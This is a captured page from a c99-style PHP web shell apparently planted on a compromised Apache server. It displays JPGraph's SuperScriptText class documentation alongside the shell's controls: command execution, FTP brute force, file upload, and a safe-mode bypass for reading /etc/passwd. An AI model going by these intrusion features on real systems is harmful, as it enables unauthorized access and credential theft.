!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/jpgraph/docs/ref/   drwxr-xr-x
Free 52.33 GB of 127.8 GB (40.95%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     SuperScriptText.html (14.44 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

CLASS SuperScriptText EXTENDS Text
(Defined in: jpgraph.php : 3343)
 SuperScriptText  Text 
 FromReal() 
 GetFontHeight() 
 GetTextHeight() 
 GetWidth() 
 Set() 
 SetSuperFont() 
 SuperScriptText() 
 Align() 
 Center() 
GetFontHeight() 
GetTextHeight() 
GetWidth() 
 Hide() 
 ParagraphAlign() 
 Pos() 
Set() 
 SetAlign() 
 SetAngle() 
 SetBox() 
 SetColor() 
 SetCSIMTarget() 
 SetFont() 
 SetMargin() 
 SetOrientation() 
 SetParagraphAlign() 
 SetPos() 
 SetScalePos() 
 SetShadow() 
 SetWordWrap() 
 Show() 
 Text() 
 

Class usage and Overview
This class is responsible for formatting a text string which have a superscript at the end. This is used to generate scientific numbers.

 

See also related classes:
Text

 


Class Methods

 

 

Create a scientific representation for a number

ArgumentDefaultDescription
$aVal  Real value to be used
$aPrecision 2 Precision (number of digits) to be printed

Description
Initialized the class from a real value to be used to present a scientific text string.  
 
See also
SuperScriptText::Set

Example

$t = new SuperScriptText();
$t->FromReal(12341.56);

// Will print 1.23*10^4

 

 

Hight of font (approximate the height of the text)

ArgumentDefaultDescription
&$aImg  Image context

Description
Return height of text. 
 
See also
SuperScriptText::GetTextHeight and SuperScriptText::GetWidth

 

 

// Hight of text

ArgumentDefaultDescription
&$aImg  No description available

Description
No description available.

 

 

// Total width of text

ArgumentDefaultDescription
&$aImg  No description available

Description
No description available.

 

 

Convert a floating point number to scientific notation

ArgumentDefaultDescription
$aTxt  Mantissa
$aSuper "" Exponent

Description
Specify the string manuall by specifyin mantissa and exponent. 
 
See also
SuperScriptText::FromReal

Example

$t = new SuperScriptText();
$t->Set("1.34 10","5");
// Will generate "1.34 10^5"

 

 

Manually set font to be used for superscript

ArgumentDefaultDescription
$aFontFam  Font family
$aFontStyle FS_NORMAL Font style
$aFontSize 8 Font size

Description
Used to manually specify font to be used for superscript. If not specified it will be detemined automatically based on the font used for the mantissa. The font for the superscript will be roughly 70% of the size of the base font.  

 

 

Constructor

ArgumentDefaultDescription
$aTxt "" Mantissa text
$aSuper "" Suoerscript text
$aXAbsPos 0 X-position (in pixels)
$aYAbsPos 0 Y-position (in pixels)

Description
Creates a new SUperSCriptClass 
 
See also
Text::Text



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0119 ]--